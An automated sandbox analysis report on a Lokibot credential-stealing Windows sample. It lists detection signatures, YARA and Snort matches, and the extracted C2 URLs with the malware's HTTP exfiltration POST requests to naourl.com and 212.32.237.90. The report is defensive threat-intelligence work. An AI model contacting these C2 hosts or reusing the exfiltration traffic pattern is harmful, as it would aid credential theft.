Loading ...

Play interactive tourEdit tour

Windows Analysis Report rfxJzZjiWv.exe

Overview

General Information

Sample Name:rfxJzZjiWv.exe
Analysis ID:534005
MD5:8ed7e6b478cf0c00934bb42e3bdf5e20
SHA1:ceb70c6dc5a85a64cc7a47e0ec12936f2d5e57db
SHA256:4395224e257fe5659011fb90649c89d295e80123d7622d6cdb5b09371573e1aa
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged

Classification

Process Tree

  • System is w10x64
  • rfxJzZjiWv.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\rfxJzZjiWv.exe" MD5: 8ED7E6B478CF0C00934BB42E3BDF5E20)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
rfxJzZjiWv.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    rfxJzZjiWv.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      rfxJzZjiWv.exeJoeSecurity_LokibotYara detected LokibotJoe Security
        rfxJzZjiWv.exeLoki_1Loki Payloadkevoreilly
        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x13ffc:$a2: last_compatible_version
        rfxJzZjiWv.exeLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x12fff:$des3: 68 03 66 00 00
        • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
              00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  Click to see the 3 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.rfxJzZjiWv.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.rfxJzZjiWv.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                      0.0.rfxJzZjiWv.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                        0.0.rfxJzZjiWv.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                        • 0x13ffc:$a2: last_compatible_version
                        0.0.rfxJzZjiWv.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                        • 0x12fff:$des3: 68 03 66 00 00
                        • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                        • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                        Click to see the 6 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: rfxJzZjiWv.exeVirustotal: Detection: 88%Perma Link
                        Source: rfxJzZjiWv.exeMetadefender: Detection: 88%Perma Link
                        Source: rfxJzZjiWv.exeReversingLabs: Detection: 96%
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: rfxJzZjiWv.exeAvira: detected
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: naourl.comVirustotal: Detection: 6%Perma Link
                        Source: http://naourl.com/data/five/fre.phpVirustotal: Detection: 11%Perma Link
                        Source: http://survey-smiles.comVirustotal: Detection: 5%Perma Link
                        Machine Learning detection for sampleShow sources
                        Source: rfxJzZjiWv.exeJoe Sandbox ML: detected
                        Source: rfxJzZjiWv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 212.32.237.90:80
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                        Source: Joe Sandbox ViewASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
                        Source: Joe Sandbox ViewIP Address: 212.32.237.90 212.32.237.90
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 190Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 190Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 163Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 163Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 163Connection: close
                        Source: rfxJzZjiWv.exeString found in binary or memory: http://naourl.com/data/five/fre.php
                        Source: rfxJzZjiWv.exe, 00000000.00000002.662546536.0000000000751000.00000004.00000020.sdmpString found in binary or memory: http://survey-smiles.com
                        Source: rfxJzZjiWv.exeString found in binary or memory: http://www.ibsensoftware.com/
                        Source: unknownHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 190Connection: close
                        Source: unknownDNS traffic detected: queries for: naourl.com
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040648B URLDownloadToFileW,0_2_0040648B

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: rfxJzZjiWv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040549C0_2_0040549C
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_004029D40_2_004029D4
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: String function: 0041219C appears 45 times
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: String function: 00405B6F appears 41 times
                        Source: rfxJzZjiWv.exeVirustotal: Detection: 88%
                        Source: rfxJzZjiWv.exeMetadefender: Detection: 88%
                        Source: rfxJzZjiWv.exeReversingLabs: Detection: 96%
                        Source: rfxJzZjiWv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040650A
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@5/2
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,0_2_0040434D
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                        Data Obfuscation:

                        barindex
                        Yara detected aPLib compressed binaryShow sources
                        Source: Yara matchFile source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rfxJzZjiWv.exe PID: 6644, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AD4
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AFC
                        Source: rfxJzZjiWv.exeStatic PE information: section name: .x
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
